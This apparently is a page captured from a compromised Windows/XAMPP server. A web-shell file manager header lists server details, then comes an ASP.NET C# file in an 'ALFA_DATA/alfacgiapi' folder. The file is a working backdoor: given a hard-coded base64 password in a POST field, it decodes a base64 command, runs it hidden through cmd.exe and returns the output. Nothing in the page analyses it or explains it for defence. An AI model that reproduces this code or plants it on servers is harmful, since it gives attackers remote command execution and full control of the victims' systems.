| Server IP : 127.0.0.1 / Your IP : 216.73.216.48 Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64 User : win 10 ( 0) PHP Version : 8.2.12 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : D:/xampp/htdocs-coblaa/ALFA_DATA/alfacgiapi/ |
Upload File : |
<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%
string cmd = Request.Form["cmd"];
string check = Request.Form["check"];
if(check == "W3NvbGV2aXNpYmxlfmFwaV0="){
byte[] data = System.Convert.FromBase64String(cmd);
cmd = System.Text.ASCIIEncoding.ASCII.GetString(data);
Process p = new Process();
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + cmd;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.WorkingDirectory = "/";
p.Start();
string output = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
Response.Write("[solevisible~api]<pre>"+output+"</pre>");
}
%>